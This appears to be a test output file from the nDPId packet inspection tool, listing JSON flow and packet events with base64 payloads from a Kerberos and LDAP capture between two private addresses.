00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1549337937726,"pkt":"AAgCHEeupB9ywglqCABFAABQE7BAAIAGfgasEAgIrBAIyQBYwB9iYc8DtUywR1AYAQDGTwAA4zLECSz5GZPNqNSL4T5BMx8WrZoQ8TiJymulR2VkZN3O1rD+5YXABg=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940431,"flow_last_seen":1549337940431,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337940431,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1549337940431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337940431,"pkt":"pB9ywglqAAgCHEeuCABFAACxAPpAAIAGkFusEAjJrBAICMAiAFjJGNiQqlyd6VAYAQDPPQAAiJisSNul39yNkXIaZ7I9abKKHsFn\/6nUnlpuYlwP2aMvOAIHPA5TwBaAhiWq+tFyYupNZpDDILw6OTtdBUx9AScUIqcHtp8iuHt0kMVzTn\/4u2MWOJ3B5oBzCaRbB4JGSnxRjDJCJirb6nGFgBI0LOLujBAlXiGb5mYfdXtWDkYlEBJfjMNCAaw="}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337940432,"pkt":"AAgCHEeupB9ywglqCABFAACbE79AAIAGfaysEAgIrBAIyQBYwCKqXKOdyRjZGVAYAQDDTwAAKYg87lVL35oh62EWNwE864\/2bfnOQr1tnnHZbVGEslhqWgqxgOlP8fU7tCl8Q\/Pa+OiAoCN8WQQSqJd8h73HLCORGVTkV2\/0V8MyUM0yQH1SL9l7PdXJm7IP\/IVn+E9KcR0nyC\/qPtxkWFJAw4YHnIb0GQ=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940432,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":359,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":359,"midstream":1,"thread_ts_msec":1549337940432,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":413,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":413,"pkt_l4_len":379,"thread_ts_msec":1549337940432,"pkt":"pB9ywglqAAgCHEeuCABFAAGPAP5AAIAGj3msEAjJrBAICMAhwAMZWxyAQJkJXFAYAQAR1wAA1H5mUL0BcI4qPWGkggFYMIIBVKADAgESooIBSwSCAUcbieRVkdOtAnzmcyqLDK9HyZo8H6AcRFkR6nkpd0sYlEbV82Qt31YdF5lIivhvCiptxoXnMPhE44z2QYycXFRvcJlMUVHmYJTlGAPASSmrxcFRtfwGd3CmxLGHH6gdXYYGgEzOmFuOyHJjprxX+WUkbubIb9DuIaCyGfu6WjSvDsJsxl8APFvUDVpwKCBx+yi4Nl7uparYkV7uyBIsOfius8LRX8aNw6uyL8Rg7Kcy+u\/AdDO7DcqqeIW4ECzaDnKuMDvhoDG1L4DC3Gyq10cUmszgrrBDkGwYBF3I07gVPaOITvdzOarlv0eTNHIPNCN07gmcrX\/ElHpPLwV7ZiI5SB1SY8Op3qesfZqAIqjOBGiyQU2+uy5qrSSffZHU9iojHh1BosRxcA7pQ15VJkC0LtUsgQyMbCX0W85YmDAFmZqe2ZivqK8="}
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337940433,"pkt":"AAgCHEeupB9ywglqCABFAAFEE8NAAIAGfP+sEAgIrBAIycADwCFAmQlcGVsd51AYAQDbOQAABQAMBxAAAAAcAagAAgAAANAW0BaIIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8Ebfn2lEYLCMVIVfFxnfrMpLLQ5jje4X2obHkLE1mHLBb3QYmIfBpDW5VyIgGbPY54D9aSU3VouXp90Sdg8ibesBCnHqUH+HJX\/hdQ0brTNgFSTOR\/m3sdIfIuZmQkzV3dPMC5PlxnwhbW8ZWYvQE="}
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"}
00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"}
00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="}
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":120,"pkt_l4_len":86,"thread_ts_msec":1549337951639,"pkt":"AAgCHEeupB9ywglqCABFAABqE+JAAIAGfbqsEAgIrBAIyQBYwCVXYI2vkZadzVAYAQBXRgAAQS6YdBRcDlPtUTrjUB8narHoPerU+E0Jfux+IwijhqkO1zkqtUVGrf6H2Py3dE6xzPm7+U9W58\/67z4LH\/YlBX9v"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951709,"flow_last_seen":1549337951709,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1549337951709,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1549337951709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1549337951709,"pkt":"pB9ywglqAAgCHEeuCABFAAEBAR5AAIAGj+esEAjJrBAICMAmAFg7QE\/YI2nTKVAYAQALhgAAZxsOaGFwcHljcmFmdC5vcmelERgPMjAzNzA5MTMwMjQ4MDVapwYCBF3PyFqoEjAQAgESAgERAgEXAgEYAgL\/eaqBljCBk6ADAgESooGLBIGIqYCMNPGCrPeLGO9qPK8YFBfjHxUTb+emA\/ivLTUTYudncy22kbyckKCiSeisUe8yJ84rq8HDegGsl0qK5XKbjnVH8LqImnH6XpTRvHWQpRpTszA\/lJoaM6MWsPPKugansbtAh5mO54t+2+bi3wT01iiQl45hp5bjTN1UEkZf+dFCUo8Xssy7aA=="}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1549337951710,"pkt":"AAgCHEeupB9ywglqCABFAADmE+lAAIAGfTesEAgIrBAIyQBYwCYjadjdO0BQsVAYAQAYcQAA4k0pIk9VQ3WSD8DyjCP6zDplkOu688cj7B+axduw7FbTE6AYUgZjQCgBXNnQmZk8AZkKxd6trQiOV9Q21Ig4\/vSvcG7YJA68j6K63UrdpgCrN\/5os+IHfd01LLYH5NyLiu66hLUPywBQtPqISEBXxfQa4YqqDi7eMFkF+tYnKAJyaEAa5CaoA\/k+JAFpYmNuKBJA\/cZZR\/sXThwZU9vDmuS8WhtIpf+zFLSMTZjUF9FuugxEPjg+p8gxz6TuBQ=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952265,"flow_last_seen":1549337952265,"flow_idle_time":7560000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952265,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1549337952265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952265,"pkt":"pB9ywglqAAgCHEeuCABFAADxATFAAIAGj+SsEAjJrBAICMAoAFgO6N+GhTfTAFAYAQDd\/AAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbrRWKgSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYglkZxyflQKWP\/Ais8K06SJm4BPQtT0hjtYpqxsbw8zJYoGM4sYpjZXyTJirO221HZEfk4Zw9eEBLahQpLvN\/C8eKG6Szv5sdWvrvtDno9G1S6IPzDJUqQoaMmLFbqp3TeM2kcY2MDfHhnn2YOkxOZoLnNXNaT+dUxt2+N2MukPguNeobu829zS"}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952266,"pkt":"AAgCHEeupB9ywglqCABFAADbE\/lAAIAGfTKsEAgIrBAIyQBYwCiFN9i0DujgT1AYAQCK\/QAAiBuHmEFFmc+WsyXKuqx9Swihi4V8obVw5s2sIwUfT4tmX1K8bbM9re\/5e5wllRug+\/LlwLPFO11iuIJBpf\/1q6VzsWXZQ3Uhj6pv9Mvwu3XM\/Kg0OKnhbHwHjTwPH8AFLK9Xs6OvjCpemPsc4QD2yHfZIqmzSgyFffWrBEHUQ0oxARyRw\/cKuJ\/iV+cgVuWHP+LCTlyCV2gs4Zw\/xETck8iUuOpN6dDKbNN8Vw5JmilGwYg="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1549337952267,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"thread_ts_msec":1549337952267,"pkt":"pB9ywglqAAgCHEeuCABFAAFiATVAAIAGj2+sEAjJrBAICMAnAYUlT+9+CA99hlAYAQDCQwAAdUvVLNApPEvRYHXzTe8zaxz\/9SHPb\/8TWpCDGqMEAHclvciM0GOY0+pGIhzH\/f\/6jOacNFpBroqFCWgt6TZwWzHkJCgQPX52B1IK52bZg0ONYZDAO1UzroKY+wbOMCsJF8\/BbP9OSbZKzzlfun2r96DSICH7w7yEUFli3VQeP0ogbe+3tFoHFjb+05dbP\/VPGYwLelBDF4MSfNFsp+OMFLmJGy8zQTsDu6jfRxBXMbl8NmKpljCGrvpbK91ZL6OpbzC0zmaE6i4hHgj8sVok02UOBn0gMsv\/uMFl8gfFKRQNU\/cuTbNe+ET9apWENw\/dcLPR6pjmHtriptNJoQ3zVjS2Tc+IkoIqsOQ3cvktrgQFCtQLWZP3pztmcBjhot2oF4ypo07u7Pn3GnXRKfmep\/RhPO\/A8\/McJI0="}
00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952267,"pkt":"AAgCHEeupB9ywglqCABFAAD6E\/1AAIAGfQ+sEAgIrBAIyQGFwCcID32GJU\/wuFAYAQAMIAAAMIQAAADMAgEPYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1aIGsolL+fu1BeIvW0ck8xNtulprbrU8LwWAQ+0HLcHzxYvBiLYdCRYKwhIeaZIrmfEg+Fmg6VMrCzRHOuCMx3gqqLIgnuXXvz9jtqiRlG1LxGN\/8hm6Dc5JLtY2J2bRsWOZJSU4VCKr7ax6LU"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952273,"flow_last_seen":1549337952273,"flow_idle_time":7560000,"flow_min_l4_payload_len":330,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":330,"midstream":1,"thread_ts_msec":1549337952273,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
